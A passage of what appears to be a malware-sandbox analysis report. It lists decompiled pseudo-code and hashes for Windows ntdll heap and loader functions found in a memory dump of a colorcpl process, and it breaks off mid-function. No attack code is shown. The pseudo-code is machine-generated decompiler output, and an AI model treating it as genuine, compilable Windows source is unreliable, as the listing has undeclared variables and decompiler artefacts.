                                                                                                0x06e28970
                                                                                                0x06e28970
                                                                                                0x06e28970
                                                                                                0x06e28972
                                                                                                0x06e28972
                                                                                                0x06e28974
                                                                                                0x00000000
                                                                                                0x06e2897a
                                                                                                0x06e2897a
                                                                                                0x06e2897d
                                                                                                0x00000000
                                                                                                0x06e28983
                                                                                                0x06e79c65
                                                                                                0x06e79c6d
                                                                                                0x06e79c72
                                                                                                0x06e79c75
                                                                                                0x06e79c75
                                                                                                0x06e79c82
                                                                                                0x06e79c86
                                                                                                0x06e79c87
                                                                                                0x06e79c88
                                                                                                0x06e79c89
                                                                                                0x06e79c8c
                                                                                                0x06e79c90
                                                                                                0x06e79c95
                                                                                                0x06e79c97
                                                                                                0x06e79ca0
                                                                                                0x06e79ca3
                                                                                                0x06e79ca9
                                                                                                0x06e79ca9
                                                                                                0x00000000
                                                                                                0x06e79ca9
                                                                                                0x06e79ca3
                                                                                                0x00000000
                                                                                                0x06e79c97
                                                                                                0x06e2897d
                                                                                                0x00000000
                                                                                                0x06e28974
                                                                                                0x06e28988
                                                                                                0x06e28992
                                                                                                0x06e28996
                                                                                                0x00000000
                                                                                                0x06e28996
                                                                                                0x06e2894c
                                                                                                0x00000000
                                                                                                0x06e28870
                                                                                                0x06e2887b
                                                                                                0x06e2887d
                                                                                                0x06e2887f
                                                                                                0x06e28881
                                                                                                0x06e28884
                                                                                                0x06e28884
                                                                                                0x06e28886
                                                                                                0x06e28889
                                                                                                0x06e2888c
                                                                                                0x06e2888e
                                                                                                0x06e28891
                                                                                                0x06e28891
                                                                                                0x06e28898
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e2889a
                                                                                                0x06e2889b
                                                                                                0x06e2889e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e288a0
                                                                                                0x06e288a8
                                                                                                0x06e288b0
                                                                                                0x06e288b2
                                                                                                0x06e288d3
                                                                                                0x06e288d5
                                                                                                0x00000000
                                                                                                0x06e288d7
                                                                                                0x06e288db
                                                                                                0x06e288dc
                                                                                                0x06e288e0
                                                                                                0x06e288e8
                                                                                                0x06e288ee
                                                                                                0x06e288f0
                                                                                                0x06e288f3
                                                                                                0x06e288fc
                                                                                                0x06e28901
                                                                                                0x06e28906
                                                                                                0x06e2890c
                                                                                                0x06e2890c
                                                                                                0x06e2890f
                                                                                                0x06e28916
                                                                                                0x06e28917
                                                                                                0x06e28918
                                                                                                0x06e28919
                                                                                                0x06e2891a
                                                                                                0x06e2891f
                                                                                                0x06e28921
                                                                                                0x06e79c52
                                                                                                0x06e79c55
                                                                                                0x06e79c5b
                                                                                                0x06e79cac
                                                                                                0x06e79cc0
                                                                                                0x06e79cc0
                                                                                                0x06e79c55
                                                                                                0x06e28927
                                                                                                0x06e28927
                                                                                                0x06e2892f
                                                                                                0x06e28933
                                                                                                0x00000000
                                                                                                0x06e288f5
                                                                                                0x06e288f5
                                                                                                0x00000000
                                                                                                0x06e288f7
                                                                                                0x06e288f7
                                                                                                0x06e288fa
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e288fa
                                                                                                0x06e288f5
                                                                                                0x06e288f3
                                                                                                0x00000000
                                                                                                0x06e288d5
                                                                                                0x00000000
                                                                                                0x06e288b2
                                                                                                0x06e288c9
                                                                                                0x00000000
                                                                                                0x06e288c9
                                                                                                0x06e2887f
                                                                                                0x06e2886a
                                                                                                0x06e28857
                                                                                                0x06e28852
                                                                                                0x06e288bf
                                                                                                0x06e288bf
                                                                                                0x06e287aa
                                                                                                0x06e287ad
                                                                                                0x06e287ae
                                                                                                0x06e287b4
                                                                                                0x06e287b5
                                                                                                0x06e287b6
                                                                                                0x06e287b8
                                                                                                0x06e287bd
                                                                                                0x06e287c1
                                                                                                0x06e287f4
                                                                                                0x06e287fa
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e287c1
                                                                                                0x00000000

                                                                                                Strings
                                                                                                • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 06E79C18
                                                                                                • LdrpDoPostSnapWork, xrefs: 06E79C1E
                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 06E79C28
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                                • API String ID: 2994545307-1948996284
                                                                                                • Opcode ID: 83586ee5cc938e19ce02aa73f43eabe138767f9081bd4975948a7922dde87258
                                                                                                • Instruction ID: 02f81e1f385f0aa429b2460034352c2736c70122f3efb7da0ee796477b9696a8
                                                                                                • Opcode Fuzzy Hash: 83586ee5cc938e19ce02aa73f43eabe138767f9081bd4975948a7922dde87258
                                                                                                • Instruction Fuzzy Hash: 6591D131A1032AAFEF98DF58C8809BB73BAFF54314B55A069D915AB241D730ED09CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E4AC7B Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 80%
                                                                                                			E06E4AC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E06E6D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x6f08a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E06E596E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E06EC3C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E06E596E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E06E1B150();
							} else {
								E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E06E1B150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E06ED14FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E06E37D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E06ED1411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E06E37D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E06ED1411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                                                                                                0x06e4ac85
                                                                                                0x06e4ac88
                                                                                                0x06e4ac8a
                                                                                                0x06e4ac8d
                                                                                                0x06e4ac91
                                                                                                0x06e4ac99
                                                                                                0x06e4ac9c
                                                                                                0x06e89f57
                                                                                                0x06e89f5b
                                                                                                0x06e89f60
                                                                                                0x06e89f60
                                                                                                0x06e4aca8
                                                                                                0x06e4acae
                                                                                                0x06e4acda
                                                                                                0x06e4acde
                                                                                                0x06e4ace8
                                                                                                0x06e4aceb
                                                                                                0x06e4acee
                                                                                                0x00000000
                                                                                                0x06e4acee
                                                                                                0x06e4acf6
                                                                                                0x06e4acb0
                                                                                                0x06e4acb0
                                                                                                0x06e4acbb
                                                                                                0x06e4acbd
                                                                                                0x06e4acc0
                                                                                                0x06e4acc5
                                                                                                0x06e4adae
                                                                                                0x06e4adb4
                                                                                                0x06e4adb4
                                                                                                0x06e4acd4
                                                                                                0x06e4acd8
                                                                                                0x06e4acf9
                                                                                                0x06e4acff
                                                                                                0x06e4ad04
                                                                                                0x06e4ad08
                                                                                                0x06e4ad09
                                                                                                0x06e4ad10
                                                                                                0x06e4ad12
                                                                                                0x06e4ad18
                                                                                                0x06e89f6f
                                                                                                0x06e89f74
                                                                                                0x06e89f76
                                                                                                0x06e89f7c
                                                                                                0x06e89f84
                                                                                                0x06e89f88
                                                                                                0x06e89f89
                                                                                                0x06e89f90
                                                                                                0x06e89f90
                                                                                                0x06e89f76
                                                                                                0x06e4ad1e
                                                                                                0x06e4ad24
                                                                                                0x06e4ad26
                                                                                                0x06e8a097
                                                                                                0x06e8a09b
                                                                                                0x06e8a0ba
                                                                                                0x06e8a0bf
                                                                                                0x06e8a09d
                                                                                                0x06e8a0b2
                                                                                                0x06e8a0b7
                                                                                                0x06e8a0c5
                                                                                                0x06e8a0c8
                                                                                                0x06e8a0cb
                                                                                                0x06e8a0d2
                                                                                                0x00000000
                                                                                                0x06e4ad2c
                                                                                                0x06e4ad2c
                                                                                                0x06e4ad2f
                                                                                                0x06e4ad34
                                                                                                0x06e4ad36
                                                                                                0x06e89f97
                                                                                                0x06e89f9a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e89fa9
                                                                                                0x06e4ad3e
                                                                                                0x06e4ad3e
                                                                                                0x06e4ad41
                                                                                                0x06e89fb3
                                                                                                0x06e89fb9
                                                                                                0x06e89fc0
                                                                                                0x06e89fd0
                                                                                                0x06e89fd0
                                                                                                0x06e89fc0
                                                                                                0x06e4ad4a
                                                                                                0x06e4ad50
                                                                                                0x06e4ad5c
                                                                                                0x06e4ad62
                                                                                                0x06e4ad68
                                                                                                0x06e4ad6b
                                                                                                0x06e4ad6d
                                                                                                0x06e89fda
                                                                                                0x06e89fdd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e89fec
                                                                                                0x00000000
                                                                                                0x06e4ad73
                                                                                                0x06e4ad73
                                                                                                0x06e4ad73
                                                                                                0x06e4ad75
                                                                                                0x06e4ad75
                                                                                                0x06e4ad78
                                                                                                0x06e89ff6
                                                                                                0x06e89ffc
                                                                                                0x06e8a003
                                                                                                0x06e8a00e
                                                                                                0x06e8a010
                                                                                                0x06e8a01b
                                                                                                0x06e8a01b
                                                                                                0x06e8a01b
                                                                                                0x06e8a038
                                                                                                0x06e8a038
                                                                                                0x06e8a003
                                                                                                0x06e4ad84
                                                                                                0x06e4ad89
                                                                                                0x06e4ad8c
                                                                                                0x06e4ad8e
                                                                                                0x06e8a042
                                                                                                0x06e8a045
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e8a054
                                                                                                0x00000000
                                                                                                0x06e4ad94
                                                                                                0x06e4ad94
                                                                                                0x06e4ad94
                                                                                                0x06e4ad96
                                                                                                0x06e4ad96
                                                                                                0x06e4ad99
                                                                                                0x06e8a063
                                                                                                0x06e8a065
                                                                                                0x06e8a070
                                                                                                0x06e8a070
                                                                                                0x06e8a070
                                                                                                0x06e8a08d
                                                                                                0x06e8a08d
                                                                                                0x06e4ada4
                                                                                                0x06e4ada6
                                                                                                0x00000000
                                                                                                0x06e4ada6
                                                                                                0x06e4ad8e
                                                                                                0x06e4ad6d
                                                                                                0x06e4ad3c
                                                                                                0x06e4ad3c
                                                                                                0x00000000
                                                                                                0x06e4ad3c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e4acd8

                                                                                                Strings
                                                                                                • HEAP: , xrefs: 06E8A0BA
                                                                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 06E8A0CD
                                                                                                • HEAP[%wZ]: , xrefs: 06E8A0AD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                • API String ID: 0-1340214556
                                                                                                • Opcode ID: 00cdb1094afd36f43e2a82b3daa55a4f67be46dd6d4bb3298de3e255952e70f5
                                                                                                • Instruction ID: 08063866be498d4ffefd8c7d109cfcbf23a65f1921319411ee304f7758a7729d
                                                                                                • Opcode Fuzzy Hash: 00cdb1094afd36f43e2a82b3daa55a4f67be46dd6d4bb3298de3e255952e70f5
                                                                                                • Instruction Fuzzy Hash: BD811131640784EFE7A6DB7CD884BAAB7F8EF04328F0411B5E9558B692D734E940CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E3B73D Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 74%
                                                                                                			E06E3B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E06EDA80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x6f08748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E06E1B150();
					} else {
						E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E06E1B150();
					__eflags =  *0x6f07bc8;
					if(__eflags == 0) {
						E06ED2073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E06EDA80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x6f08720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x6f08720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E06E3B8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E06EDA80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E06E3E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}






























                                                                                                0x06e3b746
                                                                                                0x06e3b74b
                                                                                                0x06e3b74d
                                                                                                0x06e3b750
                                                                                                0x06e3b755
                                                                                                0x06e3b758
                                                                                                0x06e3b758
                                                                                                0x06e3b75e
                                                                                                0x06e3b763
                                                                                                0x06e3b764
                                                                                                0x06e3b76a
                                                                                                0x06e3b76d
                                                                                                0x06e3b771
                                                                                                0x06e3b776
                                                                                                0x06e3b85c
                                                                                                0x06e3b85d
                                                                                                0x06e3b860
                                                                                                0x06e3b865
                                                                                                0x06e82ba1
                                                                                                0x06e82ba2
                                                                                                0x06e82ba9
                                                                                                0x06e82bae
                                                                                                0x06e82bae
                                                                                                0x06e3b77c
                                                                                                0x06e3b77c
                                                                                                0x06e3b77c
                                                                                                0x06e3b785
                                                                                                0x06e3b788
                                                                                                0x06e82bb6
                                                                                                0x06e82bb9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e82bbf
                                                                                                0x06e82bc5
                                                                                                0x06e82bc9
                                                                                                0x06e82be8
                                                                                                0x06e82bed
                                                                                                0x06e82bcb
                                                                                                0x06e82be0
                                                                                                0x06e82be5
                                                                                                0x06e82bf3
                                                                                                0x06e82bf8
                                                                                                0x06e82bfd
                                                                                                0x06e82c05
                                                                                                0x06e82c0e
                                                                                                0x06e82c0e
                                                                                                0x00000000
                                                                                                0x06e3b78e
                                                                                                0x06e3b78e
                                                                                                0x06e3b78e
                                                                                                0x06e3b791
                                                                                                0x06e3b791
                                                                                                0x06e3b797
                                                                                                0x06e3b797
                                                                                                0x06e3b79f
                                                                                                0x06e3b7a9
                                                                                                0x06e3b7af
                                                                                                0x06e3b7af
                                                                                                0x06e3b7b1
                                                                                                0x06e3b7b6
                                                                                                0x06e3b7e2
                                                                                                0x06e3b7e2
                                                                                                0x06e3b7e7
                                                                                                0x06e3b880
                                                                                                0x06e3b7ed
                                                                                                0x06e3b7ed
                                                                                                0x06e3b7ed
                                                                                                0x06e3b7ef
                                                                                                0x06e3b7f2
                                                                                                0x06e3b7f2
                                                                                                0x06e3b7f5
                                                                                                0x06e3b7fa
                                                                                                0x06e82c2d
                                                                                                0x06e82c2e
                                                                                                0x06e82c39
                                                                                                0x06e3b800
                                                                                                0x06e3b800
                                                                                                0x06e3b802
                                                                                                0x06e3b805
                                                                                                0x06e3b808
                                                                                                0x06e3b808
                                                                                                0x06e3b80a
                                                                                                0x06e3b80d
                                                                                                0x06e3b816
                                                                                                0x06e3b81c
                                                                                                0x06e3b822
                                                                                                0x06e3b82f
                                                                                                0x06e3b88b
                                                                                                0x06e3b892
                                                                                                0x06e3b897
                                                                                                0x06e3b899
                                                                                                0x06e3b89b
                                                                                                0x06e3b89e
                                                                                                0x06e3b8a5
                                                                                                0x06e3b8a8
                                                                                                0x06e3b8aa
                                                                                                0x06e3b8ac
                                                                                                0x06e3b8ac
                                                                                                0x06e3b8aa
                                                                                                0x06e3b892
                                                                                                0x06e3b831
                                                                                                0x06e3b839
                                                                                                0x06e3b83b
                                                                                                0x06e3b83b
                                                                                                0x06e3b844
                                                                                                0x06e3b84b
                                                                                                0x06e3b852
                                                                                                0x06e3b7b8
                                                                                                0x06e3b7ba
                                                                                                0x06e3b7bf
                                                                                                0x06e3b7c4
                                                                                                0x06e82c18
                                                                                                0x06e82c19
                                                                                                0x06e82c23
                                                                                                0x06e3b7ca
                                                                                                0x06e3b7ca
                                                                                                0x06e3b7cc
                                                                                                0x06e3b7cf
                                                                                                0x06e3b7d1
                                                                                                0x06e3b7d1
                                                                                                0x06e3b7d4
                                                                                                0x06e3b7dc
                                                                                                0x06e3b8bb
                                                                                                0x06e3b8bb
                                                                                                0x06e3b8be
                                                                                                0x06e3b8be
                                                                                                0x06e3b8c1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e3b8c3
                                                                                                0x06e3b8c5
                                                                                                0x06e3b8c7
                                                                                                0x06e3b8e0
                                                                                                0x00000000
                                                                                                0x06e3b8e0
                                                                                                0x06e3b8cc
                                                                                                0x06e3b8cc
                                                                                                0x00000000
                                                                                                0x06e3b8cc
                                                                                                0x06e3b8d6
                                                                                                0x06e3b8d6
                                                                                                0x00000000
                                                                                                0x06e3b7dc
                                                                                                0x06e3b7b6

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                • API String ID: 0-1334570610
                                                                                                • Opcode ID: 6525e9a82dda0388193d8ae9b45da7de64e9c3f342fa427cdec7f013e222b1cf
                                                                                                • Instruction ID: 2c1c0b161aa85ae2b5933bd3559b041fd066402f9db6d95c7467ff52970a85bb
                                                                                                • Opcode Fuzzy Hash: 6525e9a82dda0388193d8ae9b45da7de64e9c3f342fa427cdec7f013e222b1cf
                                                                                                • Instruction Fuzzy Hash: 4061F470A10355DFEB98DF24C849BAABBE5FF54304F14956EE85A8F281D730E881CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E27E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 98%
                                                                                                			E06E27E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E06E2CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
